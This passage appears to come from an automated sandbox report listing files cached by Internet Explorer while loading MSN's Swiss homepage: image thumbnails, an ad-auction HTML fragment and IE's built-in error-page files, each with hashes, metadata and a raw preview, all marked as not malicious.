SSDEEP:	192:BYhXmZBtIQPbKYxRboV/tLA97xxzzJeHTPvwnwvHjj2SfIMbofcporEDHOd/6aUf:esZBjP2ubobw7vzzSrTlfI5rEad/6
MD5:	875A3B2CAECFB5407C0CB15AEA189F7B
SHA1:	2A66298DA44F977FD72D0455C6F81BBD1ABDAC7F
SHA-256:	AF8DA66CE90FF41C2E8311F1E8DF8BF103961A489D30485FE6D9EF8797DEC529
SHA-512:	97240E8FEB0C7D2A0C7A8380C10BA63C077B5C8BE4BC7D9A459FAD5758D165BBA7957E4F3AB227818FF446AF1029F7331D308AE2C07173613706FB556A4DD6AF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ablv8.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1662&y=999
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Y6....O.I......\|.....[.....4.....i.S..^...z`x.3...r...#....d..H$.Z.C.a.h......P..~..3.....~o.1.&...d_..d...P.E.0....P...s..]"4....Q...6..?.+..>...[.:t2.....FzVc..(.1....Qp.]^...m.O.....&..yX~..5.M.4....1@.x.n.F~.<.z..,.<..e..:c.`l.Z..d...f.+sN.P..B?.W.r.MR.j,....6...:S.z.rph.......QDw...S.<.8....0..HA....zS.....P0.&i1E.=_...1A...i..JL.G^..!.pZ(.....~P.psN..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1b7QJq[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	30504
Entropy (8bit):	7.959699282378299
Encrypted:	false
SSDEEP:	768:7DvAuCqATjhqzbuR380V27WC9X93qf6Ck4JnRu:7DvAuCfwvuRo996U4JA
MD5:	7CCC5E934AF0F8ECDD80BCA1FAC9C525
SHA1:	0A95E71C34CD53C639B6EE59CF3343CFF0B54183
SHA-256:	6DBA5252BE28410AAAAD98E5282B986409C1BAEEA7898D26BB6A8E337ACBA5F6
SHA-512:	E8AFCF8C05A13EF9D30662EB04E6BCD4FE4AD2B74C42D001A3A62CD90ED8E471549BE6906A7AF04A6B78AEE863CBD60BAD5419C8C7ADC3C9E8491B172C31CE33
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b7QJq.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....9..P....-1.y'.s`Vk..<.X..Qr.bFI..j...+ ...U[...........),....nu]....Md.u.#.L...Us..U..h.P.E.2`..In...`+.Yw.."n..Vy.V.f'.....3r9...wzV.q."(..%gtl.EmX.....".Iu4RL.e..=8.=X}....oNsL...\..T..&l..W#.Y..\.W,..../......h.C..Ct.u......f.....>...z..'....q5. ..=..<.\|w.......iF_.U.$...)n..V..g..`....5.z...d..y*Qm...P.\...4m....k..}UI......n..z.........F.]..\..I#

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1beICf[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12195
Entropy (8bit):	7.945636130485511
Encrypted:	false
SSDEEP:	192:BYSQmZ3wB3PYTiGDXAS/deRshozwUSdRpp/PG5WtvEs+0QydsSIDN6dwiXxQYzrY:eS3Z43PEvD7/druzwUohFW0QV8dwWrYr
MD5:	FB20534262E8472B6FAB4F2B7BE5FF6E
SHA1:	6D6F83E6847FFC736989BDD397F43459D3629E28
SHA-256:	30B8A6DFE4D9F3CB75484116E4692BC1D76C80699B5B2543975DC57FDF615688
SHA-512:	E216307A39B80AE74BA98883BBD6E3F4022C3D03A0220B21D58DF95D418CB43E48D22620B990C6F9721B80C4C136D6EB8A7F06DEE6C8A29A92AAE94469CE6313
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1beICf.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1865&y=1697
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h...(CU..A'Z....JSIPPQE...z.u.Z..[i.....j..D...9.\u.".FQ...s.5.=.y.....`...y.[ .w..N.....h.A.........q..o.~......F....+...{.rI.:....i..t`.jr.7lu8.d.(.......pQ.V....[.n....<.5.....`...6..b.qU.+,.(.T..49..Q....I..0.$...cY...$Q@.I..jO.8,W.Q#...Q[........<....,cX...k...r.R..W~.&.t? ..U.T.'..:!i)i..QI@..Q@..Q@..Q@.E.P.QKI@.E-%.%.Q@...ZCL..Wz..*....H..R.J...)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bfQP8[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	2151
Entropy (8bit):	7.793315132699848
Encrypted:	false
SSDEEP:	48:BGpuERAf0KrNDIezoNupPCVskeXCPfbe9kEBPsDhDbwFQ:BGAEq0Krln0u0XeXCHKdBPw9wFQ
MD5:	FCB2C2492410CDC49DC3A8B28BDBB745
SHA1:	33AE0BA2D99EC07C4192CD721337CB626FC2C39D
SHA-256:	F70928D14994C8DB6A07F9BEB58E86B7A6A11498B649113BC68233F567731549
SHA-512:	0FEE9BCFCC0807CD9201356C27BA47E643C33D192D3BCC19C539FDDDF8401B0861242259934F4917628D089537B30B967888E1C469FA719A20B2992892F1D478
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bfQP8.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=578&y=187
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....u?t8#...g..r5+8..P[.....WK.{(..X..U.$........2K..H1.8#..Mr.......'b.q.j..7.a..b...,.....U.=o'..].:.S'...V...:Ug(..%...C........p...<...d9.s[..L.Lq....'$S........ ..Nh^z.S!.J...R....+H.I]...r.&._.V.....<....^..r0+.Kk[..u....C..tT.1....r.*1.do....e......Z..-..<.P..Il..W9.J.j3.P.7...S[.. t.T'.5gc...r....e....../.C}h.v+#...`.G.s. .......~}.8#..+..8..[.F.T.t(..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bfvPr[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	6741
Entropy (8bit):	7.92168623318657
Encrypted:	false
SSDEEP:	192:BFsta/cqIkIezimCQoP2/1ruJT8EfSqGCyqnz:vs+6kIeePs1mTrf1z
MD5:	1631A0AF5667E22587BDCAFAFDF412CA
SHA1:	94687D292E6CE00AC64D00218F032961922EAF9F
SHA-256:	A95D58FDA5ABBE3095211E0784F3960E3BCA8B65A2BDCFDD53DBA71D11950FC1
SHA-512:	C9CFA6A8D4725124EF512C80E5130473C46C6BB39FA60C6E6C0863640441E966FB7A190D8ADA470B94DE66CF12CF7F5121ED49618093A4E4CCCDFD09BF1B4C5D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bfvPr.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=754&y=302
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Qs...j..C, .A.D..A.D1.:.p).:.8..(.0..~j@>aR..0@.... <.-!..\|.<C..x...).D2h..SF8.F>Z.1.Q#..O.~..Zw.....T.x...T....?./F8.TTq..Eq......Wd.B.A..J..K....x..;5...n...i/&.l.>...i.S..<......=*{{9..H.=.qJSv.q..q...=...A..E.^.DA.OC.}+Mt..uFR.....M..Y.J.H.k.u9Q..\..i..\|.Ct.V..x..v#....+c.AY%H.Py.z..$.2.....iN...".>V.;H%... .S.\|.../zf.X...r.J.S...(;...k..?.4...j

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bg03i[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	8548
Entropy (8bit):	7.940433942492513
Encrypted:	false
SSDEEP:	192:BCLN7j+D/HO0M5OqW5u0BiVAGCliwpgRr4MegidnVQ+W/D1QX:kLl8Pdv5uSqAGOSUMWnV7WxI
MD5:	B2360C40DFD8B6DFAB4AB72FD7EB765C
SHA1:	D97B4181DAEF2BB756CEDA6F659BC4EFB5F3E82F
SHA-256:	13D0DA62392FF6EBAB7039086D2C9150BF8DCAE4F58445DBDD19DD0C9CEDDE11
SHA-512:	B788589D6039F7C9C9EA4D2308E8ADE9B016413C5F7C7246DF5599337070A678A6474A3C310204753BDECAA9F6598DB7A77CB60B9CB66C039EA9D922F3824B89
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bg03i.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=643&y=114
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..$d7....=Ei}...T...J..!....;U.+....V.J..?.A...T.7Yj..<%.(...g..~.#.&.Gg...G.t.....I...../J....%H.V....0.&..#5....fK..T{..B...4.x.I.....f...w...i.;......+....:.U....6.....qK..+.O.....<P!.Z..J.h.g.i.U..G:...S.5YO..qPN.)2...l..4..C.~.....(.ss..)..~....4.O..3k.q....z...i.qL.O...(.d~.+%....5V.<.........R`jk~(k[e6!...y z..{Q.Fw..'.r..g..n..Q.`U).s0.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bgAKX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 228x228, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12545
Entropy (8bit):	7.944635947872198
Encrypted:	false
SSDEEP:	384:+cM8nS7CbgbbybVkjYIfLeAqfenueB4oA:+x7bHy2jYIDgenuqPA
MD5:	BC193954689E2798D82BB573660E01A9
SHA1:	245A51303672B0AE5290D7AF3EE070862D3EBB0C
SHA-256:	4351FFCE761A1E9FD66ED2CFC848EF1E7DE939234298B59FD5450A78A46992B2
SHA-512:	9E4E3CD01E97A4620C3EA20C67C0B81201AAC50E0D78C224E7292B58B5D60E9DB66F8D0ADBC52E93F7C535C46F846E5C37DD7EE300D77BF99422152E74666FF4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgAKX.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h..AKE..QKE..QK@..Q@.-.P.E...QE..(......(...(...(...Z.(...(...(...(...(...(...(.....P3...m-....(....)h.)h...)h...(..E-..QE..QE-.%..P.R.E..QE..QE..QE..QE.-.Q@.E.P.E.P.E.P........#.E."...z.".u(~..........h+\......v...f..e...Nw`..N=?....\|9x,.v..O......]tg..N*..h...1....U.........d.....Lq.@..K.A...Q.eR.#..:<...W.E.jP..........8....V...Y.....R......W......u..?..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bgm7O[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	19777
Entropy (8bit):	7.947542889722787
Encrypted:	false
SSDEEP:	384:erqtfI+tQcL4aj1MGNpebaTAh5SHstRxuW3ICQd/wt:eTf24a1pebaTAh5QCCk
MD5:	4B66F87050E07128AFB24C3860D30941
SHA1:	10A750C8B79B1A49FF8B35B66EF180094CDA9D6F
SHA-256:	497163F25BC4F70E685235310A08CF7AE274B84BE1D241CFB39508A4D24D749F
SHA-512:	DB369F30C340ECE11B2543999B6009C44DB77B84EF657DD6C826FBC3E3D7AE5984E13D50EC0DAF3B4B34DBB739A4459DA62953916DDB9E371DB722E8A6F9890C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgm7O.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..O.....e;.<......fO3B...o...n.='....E......8.l.T^..T..Y,..4.......\..!...`......@.@.z.#.,......[M..'.M.M.<.....k..Un...w..-.#?.B.z\|..m.....a4.2`.'.....9.....,/....8{r.&..G.,...\.........N...E.r.n...q.....A`...........U..b..6..*.n..x{\zaM...@.\|....Q.../.6$.....wfz.i..\|..T.j.s.../?.(......h.T..!..U.d.<.Db. .5..L.U.g....I..C=.t...'.t....A..........K.K

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bgo7I[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	16033
Entropy (8bit):	7.958974971172511
Encrypted:	false
SSDEEP:	384:Zmkyji9j3/p3hdL4jMr+DPOvPyoxukQFJF:Zm3aj3/p3PkTDml4l3
MD5:	EEBCF3100FC63753C2A3636FC0D2225A
SHA1:	661D97DF221BF4823E3A13E4769CE98E7E591CA0
SHA-256:	581CA5FDFD1DD7FEA07CC1ED1342DA748D1E0104F4C623641BA90608DE3B7CEC
SHA-512:	0DD2CCD7EFDC2A73E74E76E8D020C227F80E2AD67E775AEE28D600BA5633CBD7A4B26FE080A0CCC35EFFCB913B20D68E5D76FF217037ED0042410B4F71962AF6
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgo7I.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...in....s....w..=..-h..6?.......Y8.p..C8.r.K;T.6.....rw.2K2.y..'..]...2..$...~\.3.%.Q.....Y..A.a.q...9'.Ov.=."...X...b`&...''-R.B....y...AS..w..Q..U.?.r....ju..dT.NOP;...7....v.H... .[.A.<.qH.#f..{f.t..9..8.....b..I.q..W9....D.2...?1....9a..n.!.....T6.S..9 ....<.....q.=....K8.3.q7.....Y.....(.H..Ol.H$.q?.v...;.?.l.<aU.S...W....4/..$hg..vK........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1bgyAZ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11608
Entropy (8bit):	7.9256199607978415
Encrypted:	false
SSDEEP:	192:BYK4AQOZ3ZFmOqlyiVdimq5qnUg0IClLMR/FmgNkiQiZd6yY4OLBtROD+hZbn:etAQOinbimWgjQ4R/HNkiQuUyYL1nYkp
MD5:	F69A15FDC492EA414E58D8F8DE66DA9B
SHA1:	30FBE8EEE69F38BEF441698D52EE6EA4A57AA00E
SHA-256:	E8980AD6612C6D05169791503DDE85B6D46392DE572A8D9B8D8494684E51A3CB
SHA-512:	27C52D4325D89284DE1C1C1A37F7C859DCE7331E8F02490C6E85A6C49F8054CECC4923FE8F4479FEE94149EE77D4CB722EF607B46F9F292E91165CCA402F3473
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgyAZ.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=537&y=261
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J84b..c$...!.8.R4...%>T1./]..=...X.O..V..q$..&v....o...s..x.E...B.m..e..8...nX..............W.3...W<.Y.nI.r...8.k[O.V.......jC.K..Q...}(..2.O.d.S..n.Ov..,...-Yp....Ncml..ZS.(.\|..u.2..;..%..A. .+t.*.wd5.y..V%.S-.L.\.....D0..u..s.i?.Z..C....A.T...P........+8.....5ouV..cdn.T6s.DQ..gi...7...C...8.x-.KE..W..0......- .4.7..c....f{..n..q.!8o.j...K..c.',zf.9Y"e..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	19795
Entropy (8bit):	5.724489424477716
Encrypted:	false
SSDEEP:	384:zyR7s70WmhzABe0RUC/A4PFbv91qHywQo0W3dJwWwWOP1IKmTdwrb0R4lpzkYp80:2CAWm+DRUKPlv91qDuW3w7NIKYusR4PH
MD5:	BBE932A1D1D833AB4DCE1A5C9C6CFAD3
SHA1:	018FDEF52E5680CE57FA00B2140F367193BF66F1
SHA-256:	13A45FB3742E8D1A52B2683FB0B4FD2DDCA950F75F76A64D8EA9256465444AD7
SHA-512:	BD04E44AD8DAC2AC96E11DC7C5B1A1600D177472FFE669EBAC20F1BDD18701875BD35C154696FD5F948C7D298CC7D3571A3914CE6CE5A7189944D060E80AA65A
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=a16315818c9f4b41b00a4c8209d92d24&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1606154472552
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_27f468618f496ef3dd489237c69ada0d_ea7190df-ba40-42c9-9112-cedb5243c55c-tuct6b4ffdd_1606122077_1606122077_CIi3jgYQr4c_GPS0u6mS-MCMLCABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ"},"tbsessionid":"v2_27f468618f496ef3dd489237c69ada0d_ea7190df-ba40-42c9-9112-cedb5243c55c-tuct6b4ffdd_1606122077_1606122077_CIi3jgYQr4c_GPS0u6mS-MCMLCABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ","pageViewId":"a16315818c9f4b41b00a4c8209d92d24","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	384110
Entropy (8bit):	5.483716688854264
Encrypted:	false
